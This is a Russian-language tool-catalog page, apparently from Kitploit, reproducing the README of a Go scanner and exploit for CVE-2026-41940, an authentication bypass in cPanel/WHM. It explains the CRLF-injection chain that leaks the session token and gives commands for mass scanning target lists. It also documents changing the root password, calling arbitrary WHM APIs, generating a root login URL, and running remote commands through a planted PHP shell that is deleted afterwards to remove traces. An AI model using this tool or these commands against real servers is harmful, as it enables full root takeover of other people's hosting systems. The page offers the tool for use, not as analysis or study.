Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cPanelWHM-AuthBypass — Go-сканер и эксплойт-инструмент для CVE-2026-41940, обхода аутентификации в cPanel/WHM. Поддерживает массовое сканирование, утечку токенов и действия после эксплуатации, такие как RCE, смена пароля и вызовы API. | Kitploit
Инструменты/GitHubGitHub/kagantua/cpanelwhm-authbypass
Сканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеАутентификацияRed Teaming
GitHubkagantua/cpanelwhm-authbypass

cPanelWHM-AuthBypass

Go-сканер и эксплойт-инструмент для CVE-2026-41940, обхода аутентификации в cPanel/WHM. Поддерживает массовое сканирование, утечку токенов и действия после эксплуатации, такие как RCE, смена пароля и вызовы API.

Репозиторий
11744 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

cPanel/WHM Auth Bypass Scanner & Exploit Tool

Инструмент командной строки на Go, переписанный на основе Python PoC от watchTowr, для обнаружения и эксплуатации уязвимости обхода аутентификации CVE-2026-41940 в cPanel/WHM.

Обзор уязвимости

CVE-2026-41940 — это уязвимость обхода аутентификации в cPanel/WHM, где цепочка атак через CRLF-инъекцию в заголовок Basic Auth приводит к утечке токена безопасности и получению root-доступа к WHM.

Цепочка атак из 4 этапов:

  1. Предварительная аутентификация — отправка неверных учетных данных на /login/ для получения исходного cookie whostmgrsession
  2. CRLF-инъекция — внедрение символов новой строки через заголовок Authorization: Basic, чтобы заставить сервер раскрыть токен безопасности cpsess в заголовке Location при 307-редиректе
  3. Распространение токена — вызов do_token_denied для распространения внедренных данных аутентификации из исходного хранилища в кэш
  • Проверка прав — использование раскрытого токена для доступа к /json-api/version и проверки получения root-прав
  • Возможности

    • Пакетное сканирование — массовое обнаружение целей из файла с параллельным выполнением
    • Проверка одной цели — быстрая проверка по указанному URL
    • Умная обработка URL — автоматическая совместимость с http://, https://, форматом без протокола, автоматическая дедупликация
    • Эксплуатация уязвимости
      • Смена root-пароля (-passwd)
      • Вызов произвольного WHM API (-api)
      • Генерация URL для входа в один клик (-session)
      • Удаленное выполнение команд / RCE (-cmd)
    • Подсветка в терминале — [VULN] красным, [SAFE] зеленым
    • Сохранение результатов — URL уязвимых целей автоматически сохраняются в файл

    Сборка

    root@kitploit:~
    # Требуется Go 1.20+
    cd cpanel-checker
    go build -o cpanel-checker .
    

    Использование

    Обзор параметров

    ПараметрОписаниеПример
    -uURL одной цели-u https://1.2.3.4:2087
    -fФайл со списком URL-f targets.txt
    -oПуть к выходному файлу (по умолчанию result.txt)-o vuln.txt
    -cКоличество одновременных проверок (по умолчанию 10)-c 20
    -hostnameУказать заголовок Host вручную (по умолчанию автоопределение)-hostname cpanel.example.com
    -passwdСменить root-пароль (только режим -u)-passwd NewP@ss123
    -apiВызвать функцию WHM API (только режим -u)-api listaccts
    -api-paramsПараметры WHM API, через запятую-api-params user=root,password=123
    -sessionСгенерировать URL входа root в один клик (только режим -u)-session
    -keepНе удалять временную учетную запись RCE (в сочетании с -cmd)-keep
    -cmdВыполнить удаленную команду / RCE (только режим -u)-cmd "id"

    1. Проверка одной цели

    root@kitploit:~
    ./cpanel-checker -u https://target:2087
    

    Порт по умолчанию — 2087, следующие записи эквивалентны:

    root@kitploit:~
    ./cpanel-checker -u https://target
    ./cpanel-checker -u target
    

    2. Пакетное сканирование

    root@kitploit:~
    ./cpanel-checker -f targets.txt -c 20
    

    targets.txt поддерживает следующие форматы (по одному на строку, строки, начинающиеся с #, — комментарии):

    root@kitploit:~
    https://1.1.1.1:2087
    http://2.2.2.2:2087
    3.3.3.3:2087
    4.4.4.4
    # это комментарий
    
    • Автоматическая дедупликация: http://1.1.1.1 и https://1.1.1.1 считаются одной целью, сканируются один раз
    • Адреса без протокола автоматически дополняются до https://
    • Адреса без порта автоматически используют 2087
    • Результаты сохраняются в result.txt (можно изменить через -o)

    3. Смена root-пароля

    root@kitploit:~
    ./cpanel-checker -u https://target:2087 -passwd "NewP@ssw0rd!"
    

    4. Вызов произвольного WHM API

    root@kitploit:~
    # Список всех учетных записей
    ./cpanel-checker -u https://target:2087 -api listaccts
    
    # Вызов с параметрами
    ./cpanel-checker -u https://target:2087 -api passwd -api-params "user=root,password=abc123"
    

    5. Генерация URL входа в один клик

    root@kitploit:~
    ./cpanel-checker -u https://target:2087 -session
    

    Выводится URL, открыв который в браузере, вы попадете в панель управления WHM. В панели используйте функцию Terminal для получения интерактивной root-оболочки.

    Примечание: -session — полуавтоматический — после генерации URL входа инструментом, вам нужно вручную открыть его в браузере.

    6. Удаленное выполнение команд (RCE)

    root@kitploit:~
    ./cpanel-checker -u https://target:2087 -cmd "id"
    

    Добавьте -keep, чтобы сохранить временную учетную запись для входа в панель cPanel:

    root@kitploit:~
    ./cpanel-checker -u https://target:2087 -cmd "id" -keep
    

    При использовании -keep вывод будет содержать имя пользователя, пароль и адрес входа в cPanel (https://host:2083) временной учетной записи — используйте эти учетные данные для входа в панель cPanel.

    -cmd — полностью автоматический, не требует ручных действий. Внутренний процесс:

    1. Использование обхода аутентификации для получения root-прав
    2. Создание временной учетной записи cPanel через WHM API
    3. Запись PHP-шелла в ~/public_html/ через UAPI (Fileman::save_file_content)
    4. Выполнение команд через HTTP-запрос к https://host/~tmpuser/shell.php
    5. Возврат вывода команды
    6. Автоматическое удаление временной учетной записи (очистка следов)

    Предварительное условие: порт 80 или 443 цели должен быть доступен, и Apache/httpd должен работать.

    7. Комбинированное использование

    Несколько параметров эксплуатации можно использовать одновременно:

    root@kitploit:~
    # Одновременно получить URL входа, выполнить команду и сменить пароль
    ./cpanel-checker -u https://target:2087 -session -cmd "id" -passwd "NewP@ss123"
    

    8. Ручное указание заголовка Host

    Когда IP-адрес цели не совпадает с именем хоста, настроенным в cPanel, его можно указать вручную:

    root@kitploit:~
    ./cpanel-checker -u https://1.2.3.4:2087 -hostname cpanel.example.com
    

    По умолчанию инструмент автоматически определяет правильное имя хоста через 307-редирект /openid_connect/cpanelid.

    Пример вывода

    Пакетное сканирование

    root@kitploit:~
    [1/5] [VULN] https://1.1.1.1:2087 - token=/cpsess1234567890
    [2/5] [SAFE] https://2.2.2.2:2087 - stage2: no cpsess token leaked (HTTP 301), likely patched
    [3/5] [SAFE] https://3.3.3.3:2087 - stage1: request failed: dial tcp: i/o timeout
    [4/5] [VULN] https://4.4.4.4:2087 - token=/cpsess0987654321
    [5/5] [SAFE] https://5.5.5.5:2087 - stage2: no cpsess token leaked (HTTP 301), likely patched
    
    ========== Сканирование завершено ==========
    Всего: 5 | Уязвимых: 2
    
      ● https://1.1.1.1:2087
      ● https://4.4.4.4:2087
    
    [+] Результаты сохранены в result.txt
    

    Выполнение RCE

    root@kitploit:~
    [*] Цель: https://target:2087
    [*] Режим: эксплуатация
    
    [0] hostname = cpanel.example.com
    [1] minting a preauth session...
        session base = abc123def456
    [2] sending the CRLF injection (Basic auth + no-ob cookie)...
        leaked token = /cpsess1234567890
    [3] firing do_token_denied to propagate raw -> cache...
        gadget fired
    [4] verifying we're WHM root...
    [+] Получены root-права WHM
    
    [*] Выполнение удаленной команды (RCE)...
        [a] Создание временной учетной записи: tmpabcde
        [b] Запись шелла: /home/tmpabcde/public_html/random.php
        [c] Выполнение команды: id
        [d] Удаление временной учетной записи: tmpabcde
    [+] Вывод команды:
    uid=0(root) gid=0(root) groups=0(root)
    
    [+] Готово. https://target:2087 скомпрометирован
    

    Примечания

    • Параметры эксплуатации (-passwd, -api, -session, -cmd) доступны только в режиме одной цели -u, не поддерживаются в пакетном режиме -f
    • Инструмент по умолчанию пропускает проверку TLS-сертификатов
    • Таймаут запроса — 15 секунд
    • Строки, начинающиеся с # в файле URL, игнорируются

    Отказ от ответственности

    Данный инструмент предназначен только для авторизованного тестирования безопасности и исследовательских целей. Тестирование систем без авторизации является незаконным. Пользователь должен убедиться, что получил явное письменное разрешение от владельца целевой системы. Автор не несет ответственности за любое злоупотребление.

    Благодарности

    • Оригинальный PoC: watchTowr / Sina Kheirkhah (@SinSinology)
    • CVE: CVE-2026-41940
    Скачать инструмент